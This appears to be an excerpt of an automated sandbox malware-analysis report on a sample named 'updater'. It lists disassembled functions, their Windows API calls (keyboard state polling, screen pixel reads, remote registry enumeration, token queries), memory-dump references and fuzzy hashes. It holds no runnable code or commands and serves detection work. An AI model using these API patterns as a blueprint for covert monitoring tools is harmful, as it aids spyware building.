OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00C2F2F0
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00C2F320
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00C2F453
CloseHandle.KERNEL32(?), ref: 00C2F4D4

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: e2f02d1cb0fdc5ea80fed5d4e893f2f2e9cdc80a25b1ca1f484928afa739838e
Instruction ID: 8cda0e07e22839e1af86b320b19dbe2796b4419029e65b5e0aac5550b3ccc2e4
Opcode Fuzzy Hash: e2f02d1cb0fdc5ea80fed5d4e893f2f2e9cdc80a25b1ca1f484928afa739838e
Instruction Fuzzy Hash: 5F819D75600310AFD724EF28D882B6BB7E5BF48710F14896DF9999B292D7F0AD018B91

Function 00C30697 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC1A36: _memmove.LIBCMT ref: 00BC1A77

Part of subcall function 00C3147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C3040D,?,?), ref: 00C31491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C3075D
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C3079C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00C307E3
RegCloseKey.ADVAPI32(?,?), ref: 00C3080F
RegCloseKey.ADVAPI32(00000000), ref: 00C3081C

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 5e268fa175586af7b12487c1211f69f7d2d9efd03a8d2f33b7a50bb48e7b0efb
Instruction ID: b72d80f02ab74dfdda243e495f926e8e6d1039a0ce477851c36b1d2d17217ce1
Opcode Fuzzy Hash: 5e268fa175586af7b12487c1211f69f7d2d9efd03a8d2f33b7a50bb48e7b0efb
Instruction Fuzzy Hash: 2C517C32218204AFC714EF68C891F6EB7E9FF85304F14895DF5959B2A2DB31E905CB92

Function 00C1EBB4 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00C1EC62
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00C1EC8B
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00C1ECCA

Part of subcall function 00BB4D37: __itow.LIBCMT ref: 00BB4D62
Part of subcall function 00BB4D37: __swprintf.LIBCMT ref: 00BB4DAC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00C1ECEF
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00C1ECF7

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 90347910f516b50d6e28376eb28be3fd17d7ee40600bd9d298200a9933343136
Instruction ID: 6021738affafba6d61e916126213ea4ebb3560b23be8789c07c7d2ddaf4a092e
Opcode Fuzzy Hash: 90347910f516b50d6e28376eb28be3fd17d7ee40600bd9d298200a9933343136
Instruction Fuzzy Hash: 11514935A00505DFCB11EF64C985AAEBBF5FF09310B1480A9E849AB3A2CB71ED51DF50

Function 00C3A67B Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 258c0c873e2d204a25d88e40995c641fe732ea9148cb37a78b43ada55476128e
Instruction ID: 6f4c112e99b14325e94bc04cfb1866a21247fb09e7fa9548903eacd076c32d36
Opcode Fuzzy Hash: 258c0c873e2d204a25d88e40995c641fe732ea9148cb37a78b43ada55476128e
Instruction Fuzzy Hash: AD41D275910114AFD710DB28CCC8FE9BBB8EB0B350F150265F9AAA72E2C7709E61DA51

Function 00BB2714 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00BB2727
ScreenToClient.USER32(00C777B0,?), ref: 00BB2744
GetAsyncKeyState.USER32(00000001), ref: 00BB2769
GetAsyncKeyState.USER32(00000002), ref: 00BB2777

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 112ad390aeaa60ed1f74c3560c5d9d9fe71beb20cb6547e03e4fa0d3633882c0
Instruction ID: ff94a82872f3dbbd0c729936165720dcb435bdb63cba904aadab98daaab4e207
Opcode Fuzzy Hash: 112ad390aeaa60ed1f74c3560c5d9d9fe71beb20cb6547e03e4fa0d3633882c0
Instruction Fuzzy Hash: AC418D35504109FFDF159F6AC844AFDBBB4FB06324F20839AF82896290CB70AD51DB95

Function 00C095D7 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00C095E8
PostMessageW.USER32(?,00000201,00000001), ref: 00C09692
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00C0969A
PostMessageW.USER32(?,00000202,00000000), ref: 00C096A8
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00C096B0

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 5308632a1ff19c70a99b60ae433d3f424710eab8a359f30f74206633f1344a23
Instruction ID: 26b39a4091980be92459560fed3f0286f35ce3e8c7104511d9909b2367975ce1
Opcode Fuzzy Hash: 5308632a1ff19c70a99b60ae433d3f424710eab8a359f30f74206633f1344a23
Instruction Fuzzy Hash: 0A31CE71900219EFDB14CF68D94CB9E7BB5FB45315F104219F925AB2D1C3B19A24DB90

Function 00C0BD85 Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00C0BD9D
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C0BDBA
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C0BDF2
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00C0BE18
_wcsstr.LIBCMT ref: 00C0BE22

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 3578dc43abcb08a11e39062dba4e27a207c3fe1c54fe0fa81e97dfdcfab56a7b
Instruction ID: 81323db5a96a940cab1d7189cf1f28fcdaaffe4be0d5bb7b0aad2aaae977eeee
Opcode Fuzzy Hash: 3578dc43abcb08a11e39062dba4e27a207c3fe1c54fe0fa81e97dfdcfab56a7b
Instruction Fuzzy Hash: C121F232204204BAEB259B39DC09FBBBBA8EF45760F10406AFD09DA191EB61DD40D2A0

Function 00C3B7BD Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00BB29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BB29F3

GetWindowLongW.USER32(017414F8,000000F0), ref: 00C3B804
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00C3B829
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00C3B841
GetSystemMetrics.USER32(00000004), ref: 00C3B86A
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00C2155C,00000000), ref: 00C3B888

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: a89ccb36a0a242d43c9a8889267db4d19b0a1c2ebecfcb630b048bcd9028b8f1
Instruction ID: d3d7b14c366934834012214b5480702ce157c4ac1b999425d2a96a369599c1fa
Opcode Fuzzy Hash: a89ccb36a0a242d43c9a8889267db4d19b0a1c2ebecfcb630b048bcd9028b8f1
Instruction Fuzzy Hash: BF219171924215AFCB149F39CC08B6A37A8FB05320F204738FA35D61E0D7308D50CB91

Function 00C26138 Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00C26159
GetForegroundWindow.USER32 ref: 00C26170
GetDC.USER32(00000000), ref: 00C261AC
GetPixel.GDI32(00000000,?,00000003), ref: 00C261B8
ReleaseDC.USER32(00000000,00000003), ref: 00C261F3

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: c7d9b550f0794b00a3137f04eb4d07ac5020dcaea764eba2db8bfb93ce98e4c7
Instruction ID: 91e4b04b20046d42a53502f8a96ca3aa788b31c5f7f3929b805e9a23b041fc94
Opcode Fuzzy Hash: c7d9b550f0794b00a3137f04eb4d07ac5020dcaea764eba2db8bfb93ce98e4c7
Instruction Fuzzy Hash: E221A175A00604AFD714EF65DC84BAEBBF9FF89310F148469F94A97652CB70AC40DBA0

Function 00BB16CF Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BB1729
SelectObject.GDI32(?,00000000), ref: 00BB1738
BeginPath.GDI32(?), ref: 00BB174F
SelectObject.GDI32(?,00000000), ref: 00BB1778

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 83a935f0ab84fd1a61a3d9fc4f9b83f10e7ef28593467414032a2bd57152f5a7
Instruction ID: 57d3df5b6aa2f4931a6e42a6ff7fdcf89d7757943c07a16ee0ca9770939ee1e7
Opcode Fuzzy Hash: 83a935f0ab84fd1a61a3d9fc4f9b83f10e7ef28593467414032a2bd57152f5a7
Instruction Fuzzy Hash: E721A17080420CEBDB109F69DC48BAD7BE8FB01311F6447A5F919A61E0DBB49C91CB92

Function 00C0C837 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00C0C84C
_memcmp.LIBCMT ref: 00C0C86A
_memcmp.LIBCMT ref: 00C0C87D
_memcmp.LIBCMT ref: 00C0C895
_memcmp.LIBCMT ref: 00C0C8AD

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: a7cdd34f89452011dc1fe3b523bb4771d7273bc1c99bb71784beec74c3743e99
Instruction ID: c012538d683ba137590f153599003912e9c282623d231a11e7cf8f9fff3993d3
Opcode Fuzzy Hash: a7cdd34f89452011dc1fe3b523bb4771d7273bc1c99bb71784beec74c3743e99
Instruction Fuzzy Hash: F901D262A001053BE20463159DC2FABA39CEA60384F04C336FE16967C2F760DF10C2E8

Function 00C1504E Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00C15075
__beginthreadex.LIBCMT ref: 00C15093
MessageBoxW.USER32(?,?,?,?), ref: 00C150A8
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00C150BE
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00C150C5

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 6908560a1f3c031ecf4fb841617d30b13ecaee541987f82b34e0baf351cce806
Instruction ID: d31b9166ad25f598ad5f621fa01b23b2835d0fdf69c4d6dd16e930481c4ad9a9
Opcode Fuzzy Hash: 6908560a1f3c031ecf4fb841617d30b13ecaee541987f82b34e0baf351cce806
Instruction Fuzzy Hash: B511E976904659EBC7019FA89C04BDF7FADAB86320F144266F928D3361D671898087F0

Function 017B73D1 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,017B7468,?,?,00000000), ref: 017B73E9

Part of subcall function 017B7149: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 017B7167

GetThreadLocale.KERNEL32(00000000,00000004,00000000,017B7468,?,?,00000000), ref: 017B7419
EnumCalendarInfoA.KERNEL32(Function_0000C31D,00000000,00000000,00000004), ref: 017B7424
GetThreadLocale.KERNEL32(00000000,00000003,00000000,017B7468,?,?,00000000), ref: 017B7442
EnumCalendarInfoA.KERNEL32(Function_0000C359,00000000,00000000,00000003), ref: 017B744D

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: 4cac0a605dcca7387c94231881f5fe13fa3a6d46700eeccf7b5da6f82eebb859
Instruction ID: 04d22f450b43d04e30c7e73c2df34c9de3dea4f1976849f2a7558b395de78b7e
Opcode Fuzzy Hash: 4cac0a605dcca7387c94231881f5fe13fa3a6d46700eeccf7b5da6f82eebb859
Instruction Fuzzy Hash: 110176B12092056FE306AA71CCAAFDAFA5CDB95B10F604470F400EB6C5EB38AE009160

Function 00C08E20 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C08E3C
GetLastError.KERNEL32(?,00C08900,?,?,?), ref: 00C08E46
GetProcessHeap.KERNEL32(00000008,?,?,00C08900,?,?,?), ref: 00C08E55
HeapAlloc.KERNEL32(00000000,?,00C08900,?,?,?), ref: 00C08E5C
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C08E73

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 9854a97e110d1689f4d84fd0ebf7816e976d9396b0cf27fa0ac5eb6f016d4157
Instruction ID: 92660963aa95a51c022378ac3d09cc9685ed6a1d3cc94d9e8701ad900ea8aed7
Opcode Fuzzy Hash: 9854a97e110d1689f4d84fd0ebf7816e976d9396b0cf27fa0ac5eb6f016d4157
Instruction Fuzzy Hash: 33016D78640204BFDB204FA5DC48EAF7FADFF8A755B604529FE99C3260DA319D14CA60

Function 00C157FF Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C1581B
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00C15829
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C15831
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00C1583B
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C15877

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 86f876dc1e450766bd37817468f11cfbaf7210cffd3855e39c6c250b7815881d
Instruction ID: cd4c8adede41ef32727f937ef1989ab6484780979b65b89f91e6c1fee07cff98
Opcode Fuzzy Hash: 86f876dc1e450766bd37817468f11cfbaf7210cffd3855e39c6c250b7815881d
Instruction Fuzzy Hash: 9F018C35C81A1DDBEF00AFE5DC48BEDBBB8FB4A711F104156E601B2180CB309690DBA1

Function 00C08CC7 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C08CDE
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C08CE8
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C08CF7
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C08CFE
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C08D14

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 84c19202895d57f2c37209ecc2c6f72affd4632f3bbf5f1698be720a13aab2e5
Instruction ID: 8f8913138bb53fa0d60d8c2964313056fb1056e61af6f4c43a15c1e148574753
Opcode Fuzzy Hash: 84c19202895d57f2c37209ecc2c6f72affd4632f3bbf5f1698be720a13aab2e5
Instruction Fuzzy Hash: 3AF0AF38240305BFEF200FA49C88F6B3BACFF5A755B208529FA44C2190CA709C04DB60

Function 00C08D28 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C08D3F
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C08D49
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C08D58
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C08D5F
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C08D75

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: ef9dcfc39358bd12d29938cb6b5b2684dd46be1890bd843905b3079a4c510f3b
Instruction ID: 1e6166506298c135702da4bce32e9e08b68d192a3195d02474a717be2805d7d3
Opcode Fuzzy Hash: ef9dcfc39358bd12d29938cb6b5b2684dd46be1890bd843905b3079a4c510f3b
Instruction Fuzzy Hash: 17F0AF34280305AFEB210FA4EC88F6B3BACFF4A755F644219FA84C2190CB709E04DB60

